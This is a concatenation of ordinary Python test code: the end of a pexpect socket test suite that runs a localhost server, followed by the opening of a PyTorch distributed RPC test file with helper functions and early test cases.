MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import pexpect
from pexpect import fdpexpect
import unittest
from . import PexpectTestCase
import multiprocessing
import os
import signal
import socket
import time
import errno
class SocketServerError(Exception):
pass
class ExpectTestCase(PexpectTestCase.PexpectTestCase):
def setUp(self):
print(self.id())
PexpectTestCase.PexpectTestCase.setUp(self)
self.host = '127.0.0.1'
self.port = 49152 + 10000
self.motd = b"""\
------------------------------------------------------------------------------
* Welcome to the SOCKET UNIT TEST code! *
------------------------------------------------------------------------------
* *
* This unit test code is our best effort at testing the ability of the *
* pexpect library to handle sockets. We need some text to test buffer size *
* handling. *
* *
* A page is 1024 bytes or 1K. 80 x 24 = 1920. So a standard terminal window *
* contains more than one page. We actually want more than a page for our *
* tests. *
* *
* This is the twelfth line, and we need 24. So we need a few more paragraphs.*
* We can keep them short and just put lines between them. *
* *
* The 80 x 24 terminal size comes from the ancient past when computers were *
* only able to display text in cuneiform writing. *
* *
* The cuneiform writing system used the edge of a reed to make marks on clay *
* tablets. *
* *
* It was the forerunner of the style of handwriting used by doctors to write *
* prescriptions. Thus the name: pre (before) script (writing) ion (charged *
* particle). *
------------------------------------------------------------------------------
""".replace(b'\n', b'\n\r') + b"\r\n"
self.prompt1 = b'Press Return to continue:'
self.prompt2 = b'Rate this unit test>'
self.prompt3 = b'Press X to exit:'
self.enter = b'\r\n'
self.exit = b'X\r\n'
self.server_up = multiprocessing.Event()
self.server_process = multiprocessing.Process(target=self.socket_server, args=(self.server_up,))
self.server_process.daemon = True
self.server_process.start()
counter = 0
while not self.server_up.is_set():
time.sleep(0.250)
counter += 1
if counter > (10 / 0.250):
raise SocketServerError("Could not start socket server")
def tearDown(self):
os.kill(self.server_process.pid, signal.SIGINT)
self.server_process.join(timeout=5.0)
PexpectTestCase.PexpectTestCase.tearDown(self)
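# The server below speaks a tiny scripted dialogue: send the MOTD plus three prompts,
# expect a bare CRLF after the first two and an 'X' to exit, and drop the connection on
# any unexpected input. It runs in a child process and is stopped via SIGINT from tearDown.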
def socket_server(self, server_up):
sock = None
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, self.port))
sock.listen(5)
server_up.set()
while True:
(conn, addr) = sock.accept()
conn.send(self.motd)
conn.send(self.prompt1)
result = conn.recv(1024)
if result != self.enter:
break
conn.send(self.prompt2)
result = conn.recv(1024)
if result != self.enter:
break
conn.send(self.prompt3)
result = conn.recv(1024)
if result.startswith(self.exit[:1]):  # slice keeps this a bytes prefix on Python 3
conn.shutdown(socket.SHUT_RDWR)
conn.close()
except KeyboardInterrupt:
pass
if sock is not None:
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except socket.error:
pass
exit(0)
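# socket_fn runs in a child process: it drains the server's initial output, signals
# all_read, then blocks in a second read that is expected to raise pexpect.TIMEOUT.
# The interrupt tests send SIGWINCH to this child to check that the blocked read
# survives signals and the child still exits with errno.ETIMEDOUT.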
def socket_fn(self, timed_out, all_read):
result = 0
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock, timeout=10)
# Get all data from server
session.read_nonblocking(size=4096)
all_read.set()
# This read should timeout
session.read_nonblocking(size=4096)
except pexpect.TIMEOUT:
timed_out.set()
result = errno.ETIMEDOUT
exit(result)
def test_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
session.expect(self.prompt1)
self.assertEqual(session.before, self.motd)
session.send(self.enter)
session.expect(self.prompt2)
session.send(self.enter)
session.expect(self.prompt3)
session.send(self.exit)
session.expect(pexpect.EOF)
self.assertEqual(session.before, b'')
def test_socket_with_write(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
session.expect(self.prompt1)
self.assertEqual(session.before, self.motd)
session.write(self.enter)
session.expect(self.prompt2)
session.write(self.enter)
session.expect(self.prompt3)
session.write(self.exit)
session.expect(pexpect.EOF)
self.assertEqual(session.before, b'')
def test_not_int(self):
with self.assertRaises(pexpect.ExceptionPexpect):
session = fdpexpect.fdspawn('bogus', timeout=10)
def test_not_file_descriptor(self):
with self.assertRaises(pexpect.ExceptionPexpect):
session = fdpexpect.fdspawn(-1, timeout=10)
def test_timeout(self):
with self.assertRaises(pexpect.TIMEOUT):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock, timeout=10)
session.expect(b'Bogus response')
def test_interrupt(self):
timed_out = multiprocessing.Event()
all_read = multiprocessing.Event()
test_proc = multiprocessing.Process(target=self.socket_fn, args=(timed_out, all_read))
test_proc.daemon = True
test_proc.start()
while not all_read.is_set():
time.sleep(1.0)
os.kill(test_proc.pid, signal.SIGWINCH)
while not timed_out.is_set():
time.sleep(1.0)
test_proc.join(timeout=5.0)
self.assertEqual(test_proc.exitcode, errno.ETIMEDOUT)
def test_multiple_interrupts(self):
timed_out = multiprocessing.Event()
all_read = multiprocessing.Event()
test_proc = multiprocessing.Process(target=self.socket_fn, args=(timed_out, all_read))
test_proc.daemon = True
test_proc.start()
while not all_read.is_set():
time.sleep(1.0)
while not timed_out.is_set():
os.kill(test_proc.pid, signal.SIGWINCH)
time.sleep(1.0)
test_proc.join(timeout=5.0)
self.assertEqual(test_proc.exitcode, errno.ETIMEDOUT)
def test_maxread(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
session.maxread = 1100
session.expect(self.prompt1)
self.assertEqual(session.before, self.motd)
session.send(self.enter)
session.expect(self.prompt2)
session.send(self.enter)
session.expect(self.prompt3)
session.send(self.exit)
session.expect(pexpect.EOF)
self.assertEqual(session.before, b'')
def test_fd_isalive(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
assert session.isalive()
sock.close()
assert not session.isalive(), "Should not be alive after close()"
def test_fd_isalive_poll(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10, use_poll=True)
assert session.isalive()
sock.close()
assert not session.isalive(), "Should not be alive after close()"
def test_fd_isatty(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10)
assert not session.isatty()
session.close()
def test_fd_isatty_poll(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock.fileno(), timeout=10, use_poll=True)
assert not session.isatty()
session.close()
def test_fileobj(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.host, self.port))
session = fdpexpect.fdspawn(sock, timeout=10) # Should get the fileno from the socket
session.expect(self.prompt1)
session.close()
assert not session.isalive()
session.close() # Smoketest - should be able to call this again
if __name__ == '__main__':
unittest.main()
suite = unittest.makeSuite(ExpectTestCase, 'test')
rpc_test.py
import concurrent.futures
import contextlib
import json
import logging
import os
import sys
import threading
import time
import unittest
import warnings
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import IS_MACOS, load_tests
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
single_threaded_process_group_agent,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
def foo_add():
return torch.add(torch.ones(1), torch.ones(1))
def udf_with_torch_ops(device=-1, use_record_function=False):
device_ctx = contextlib.suppress() if device == -1 else torch.cuda.device(device)
record_function_ctx = (
torch.autograd.profiler.record_function("##forward##")
if use_record_function
else contextlib.suppress()
)
with device_ctx, record_function_ctx:
t1, t2 = torch.ones(1), torch.ones(1)
t = torch.add(t1, t2)
t = torch.mul(t, t)
t = t.relu()
t = t.sigmoid()
# Events (operator invocations) that are expected to run as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
"aten::ones",
"aten::ones",
"aten::add",
"aten::mul",
"aten::relu",
"aten::clamp_min",
"aten::sigmoid",
]
# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "
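# Module-level futures used for cross-call signalling: a peer sets VALUE_FUTURE by
# invoking set_value() over RPC on this process, and the local test reads the result
# (e.g. test_expected_src) to confirm which worker made the call.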
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()
FIFTY_MIL_CYCLES = 50000000
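# Module-level counter mutated over RPC by the barrier tests: every worker calls
# _increment_count on the leader via rpc_sync, and the surrounding _barrier calls
# ensure the leader observes all increments before asserting on the total.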
_rpc_barrier_count = 0
def _increment_count():
global _rpc_barrier_count
_rpc_barrier_count += 1
def _reset_count():
global _rpc_barrier_count
_rpc_barrier_count = 0
class StubRpcAgent:
def __init__(self, world_size):
self.world_size = world_size
def get_worker_infos(self):
return {
rpc.WorkerInfo(name=worker_name(rank), id=rank)
for rank in range(self.world_size)
}
def _stub_construct_rpc_backend_options_handler(**kwargs):
return mock.Mock() # RpcBackendOptions.
def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
return StubRpcAgent(world_size=world_size)
def set_value(value):
VALUE_FUTURE.set_result(value)
def wait_for_value_future():
return VALUE_FUTURE.result()
def set_and_check_done(value):
VALUE_FUTURE.set_result(value)
return DONE_FUTURE.result()
# The classes and functions below are used to test Python user-defined
# functions, classes and methods over RPC.
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
def __init__(self):
self.t = None
def __getstate__(self):
(pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
)
return (pickled_python_udf, tensors)
def __setstate__(self, obj):
python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
result = python_udf.func(python_udf.args[0], python_udf.args[1])
self.t = result
def set(self, val):
self.t = val
class SlowPickleClass:
def __init__(self, t):
self.t = t
def __getstate__(self):
time.sleep(self.t)
return (self.t, )
def __setstate__(self, obj):
self.t = obj[0]
time.sleep(self.t)
class MyClass:
def __init__(self, a, delay=False):
self.a = a
# delay initialization to simulate errors if specified
if delay:
time.sleep(2)
def my_instance_method(self, b):
return self.a + b
@classmethod
def my_class_method(cls, d, e):
return d + e
@staticmethod
def my_static_method(f):
return f > 10
def increment_value(self, increment):
self.a += increment
def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
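# Helper for running a method on the object wrapped by an RRef; it is meant to be
# invoked on the RRef's owner (e.g. via rpc_sync), where rref.local_value() is valid.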
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
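# The add_use_future_* helpers below exercise different ways of chaining an rpc_async
# future: completing a concurrent.futures.Future from a then() callback, completing a
# torch.futures.Future via set_result, and nesting a second RPC inside a callback.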
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
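# The helpers below are decorated with @rpc.functions.async_execution: they return a
# Future (or raise), and the RPC framework sends the response once that Future
# completes instead of when the Python function returns.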
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
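# async_cuda_sleep_and_set_to_one returns a Future constructed with devices=[device],
# marking it as CUDA-aware so (presumably) the RPC layer synchronizes the work queued
# on the side stream before the result tensor is sent back.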
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
return self.tensor.sum()
# Copied from test/test_cuda.py.
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class RpcTest(RpcAgentTestFixture):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1 + 3)
def _test_self_remote_rref_as_rpc_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, torch.ones(2, 2) + 1))
self.assertEqual(ret, torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2) + 1)
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2))
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_rpc_arg(dst)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._test_self_remote_rref_as_rpc_arg(rpc.get_worker_info())
def _test_self_remote_rref_as_remote_arg(self, dst):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(torch.ones(2, 2), 1, 3))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, torch.ones(2, 2)))
self.assertEqual(
ret_rref.to_here(), torch.ones(2, 2) + 1 + 3 + torch.ones(2, 2)
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_self_remote_rref_as_remote_arg(dst)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._test_self_remote_rref_as_remote_arg(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
